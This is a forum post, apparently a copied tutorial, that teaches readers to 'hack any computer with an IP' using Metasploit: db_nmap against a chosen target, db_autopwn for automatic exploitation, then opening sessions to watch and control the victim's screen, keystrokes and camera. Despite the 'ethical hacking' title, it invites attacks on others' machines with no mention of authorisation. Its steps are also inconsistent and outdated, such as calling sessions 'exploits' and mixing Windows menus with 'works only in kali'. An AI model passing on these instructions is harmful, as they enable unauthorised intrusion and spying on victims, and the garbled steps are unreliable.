Please check your Spam Folder / Junk Box if you are not receiving our emails.
Also whitelist our email ID: no-reply@rice-puller.com & admin@rice-puller.com

Copied!

BUY 5,000 VARA GOLD Tokens for 1 USDT

Life Changing Opportunity! Join Vara Gold. Watch Video

« Previous Post 220594 Next Post »

ETHICAL HACKING HACK ANY COMPUTER WITH AN IP (General)

by darknet, Sunday, May 15, 2022, 08:40 PM (683 days ago)

ETHICAL HACKING HACK ANY COMPUTER WITH AN IP

I am here to show you this magical tool called Metasploit that allows you to hack ANYunpatched computer with only it's IP. Lets begin...

First you need to download Metasploit. The most up-to-date version is FREE at metasploit.com.

You need PostgrSQL for your database. Download here: http://www.postgresql.org/. Make sure you use all the defaults or Metasploit woun't work!

Now lets get down to buisness...

After installing both tools, open up the PostgrSQL admin gui (start -> all programs -> PostgreSQL 9.0 -> pgAdmin III). Then right-click on your server (in the left hand box) and click connect. Remember to keep this window open the whole time. You will also need the pass you chose to use in step 5...

Time for some hacking! Go to start -> all programs -> Metasploit Framework, and then open the Metasploit gui.

Now, in the window type:

db_connect postgres:ThePassYouChose@localhost:5432

The first time you do this you will see lots of text flash buy. Don't wory, this is normal.

Type db_host to make sure you are connected correctly.

Now type this:

db_nmap 000.000.000.000

Make sure you put the ip of the computer you are trying to hack in the place of 000.000.000.000...

Now we get to the fun part; the automatic exploitation. Just type db_autopwn -t -p -e -s -b , watch the auto-exploitation start, go play Halo for a while, and then come back...

After the exploitation is done, type sessions -l to see what the scanner found. If all went well, you should see a list of exploits.

Now we get to use the exploits to hack the computer! If you will notice, all of the exploits are numbered, and they all have obvious names (i. e., reverseScreen_tcp). In order to use an exploit, type this:

sessions -i ExploitNumber

For this method you can see their screen, control their mouse, see what they type, see them, etc ,Works only in kali !!

Free ethical hacking course in WhatsApp

Join

https://chat.whatsapp.com/DUngdpChEak2bskc321dRo

Complete thread:

 RSS Feed of thread

powered by my little forum
Using this site means you accept its terms (Revised on: Friday, 2022-May-27 / 02:54:51 pm).